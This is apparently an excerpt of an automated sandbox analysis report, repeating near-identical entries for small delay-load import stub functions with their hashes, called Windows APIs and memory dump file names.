API String ID: 1269201914-0
Opcode ID: aa7753dd1d1073dbf689401d42fcd72c57bc1f320db7d692cc3cb73c39904af4
Instruction ID: e9a8b152b6fa24d801436a5a7e789bf5a179124fe440b4e766c127764d4393d1
Opcode Fuzzy Hash: aa7753dd1d1073dbf689401d42fcd72c57bc1f320db7d692cc3cb73c39904af4
Instruction Fuzzy Hash: 27B012C225C1017C304652569C07DF7017ED4C4B10338421FF408C51C0E840CC503C72

Function 00FBE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE580

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 73f787c376f3c9800c76bac0821ff40d2d6b5bf826103ed4a3a2e7d005a91829
Instruction ID: 1c22a0351ca227db30221011a23220da44c3557501d12fba56121f96c191ac37
Opcode Fuzzy Hash: 73f787c376f3c9800c76bac0821ff40d2d6b5bf826103ed4a3a2e7d005a91829
Instruction Fuzzy Hash: F1B012C225C0017C300652579D02DF7017ED4C4B10338421FF408C51C0EC40CC113C72

Function 00FBE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE580

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8050ba48777c44ab3c2dd00d6c5d4d141c3f8b039eb452529d0cea60fc8d544d
Instruction ID: f9790d4c2904a1685c103b61d5cf4d2f814716195962468f4e7515d719bb4f61
Opcode Fuzzy Hash: 8050ba48777c44ab3c2dd00d6c5d4d141c3f8b039eb452529d0cea60fc8d544d
Instruction Fuzzy Hash: 3AB012C22580017D300653565C02DF7015EE5C8B10334401FF408C51C0EC40CC143C72

Function 00FBE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2591fa4d5b1f87dfcacb563ce91907432963616a28cb151bc0d640fd398ecb6d
Instruction ID: 76bca5c3aa1749ea65e1f1bcd18ac6d58a5848bc5e46070814b75fea17bc456d
Opcode Fuzzy Hash: 2591fa4d5b1f87dfcacb563ce91907432963616a28cb151bc0d640fd398ecb6d
Instruction Fuzzy Hash: 4DB012C269D5017C3105A10A9C07DFB014ED0C1F10334831FF448C41C0E840DC443C73

Function 00FBE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 096a8c5f6b736cfc0e65cc11c2dbe929405047aadfda899ce1ab1a41846c4945
Instruction ID: adc060a746427087c1b373636ed8df72e17feaa9ad73dc1009c73760d43f0e95
Opcode Fuzzy Hash: 096a8c5f6b736cfc0e65cc11c2dbe929405047aadfda899ce1ab1a41846c4945
Instruction Fuzzy Hash: CBB012C22994017D3005A20A5C02EFB014EE0C1F10334411FF488C41C0EC40CC043C73

Function 00FBE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff3d39c8d685ebc09bfa84545ecdf8bdd5d83654e217a00802744e5e276d797c
Instruction ID: 7719ad55a407ccf4815f0e59b965affe50224a84a25a007668a420a9aa58097f
Opcode Fuzzy Hash: ff3d39c8d685ebc09bfa84545ecdf8bdd5d83654e217a00802744e5e276d797c
Instruction Fuzzy Hash: 9FB012C22994427C3005A20B5D02DFB054ED0C1F10334811FF588C41C0EC40CC013C73

Function 00FBE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE51F

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4976ed848000d895b798436902049bdd7e4917b13196eae9b344867fd00068af
Instruction ID: 287446bc226e1269baf5e45ae2e94f9d7e4f62489cb64d3e0b37a6314bed393f
Opcode Fuzzy Hash: 4976ed848000d895b798436902049bdd7e4917b13196eae9b344867fd00068af
Instruction Fuzzy Hash: 48B012C22994017C300561265C06EFB010EE0C1F10734412FF494C44C2E840CC043C73

Function 00FBE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 318e7556cbd34cbaa630d89273d8f4248ea3c877f84aa4ab788bca4cee0c3e3e
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: 318e7556cbd34cbaa630d89273d8f4248ea3c877f84aa4ab788bca4cee0c3e3e
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b21b0ce66db8e44b4ae3043f7d1814b638d499eeab145fa3be20ec7a22bfe5c9
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: b21b0ce66db8e44b4ae3043f7d1814b638d499eeab145fa3be20ec7a22bfe5c9
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 697ccf18d07ca685cdffed9f69520c5cc57be5de8f1413251ad4148ac769ecfe
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: 697ccf18d07ca685cdffed9f69520c5cc57be5de8f1413251ad4148ac769ecfe
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 560b1dff0c43d12a900ce1a9369c0abf863cf13538233c4aa405edfedb528ad6
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: 560b1dff0c43d12a900ce1a9369c0abf863cf13538233c4aa405edfedb528ad6
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f11989b7e78397894ba47c953c55a6f293fa6c10f8430431393552a48ea45221
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: f11989b7e78397894ba47c953c55a6f293fa6c10f8430431393552a48ea45221
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 67aa53fac8eca700acaacd588a52df3b0d55a982ea4b4e73b10d9d9c8e4d40bb
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: 67aa53fac8eca700acaacd588a52df3b0d55a982ea4b4e73b10d9d9c8e4d40bb
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 50784e8f3771edd8ffd62af3c03e6f51bdb09474fa9074a570d5bb90bf920638
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: 50784e8f3771edd8ffd62af3c03e6f51bdb09474fa9074a570d5bb90bf920638
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d291f0b323f0502f496425bc404f88c2d083574386eae36b8ee24b40bf736bca
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: d291f0b323f0502f496425bc404f88c2d083574386eae36b8ee24b40bf736bca
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 071de72c990714c0ca50353fd9eb2c4b387cd11262bde111496bafd23122bfb5
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: 071de72c990714c0ca50353fd9eb2c4b387cd11262bde111496bafd23122bfb5
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2e471dfa2465411e3c9b0665643f02a014d72862f6193d46c659c5cefea8b707
Instruction ID: 3f683a8f287492b1121ed3a77f9e8d7cf387ee4d7cbeebd760d9003023114b0a
Opcode Fuzzy Hash: 2e471dfa2465411e3c9b0665643f02a014d72862f6193d46c659c5cefea8b707
Instruction Fuzzy Hash: 56A001E62A9542BC350862576E06EFB125EC5C5B61338C92EF816C4581A895A8457CB2

Function 00FBE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FBE1E3

Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1

Memory Dump Source

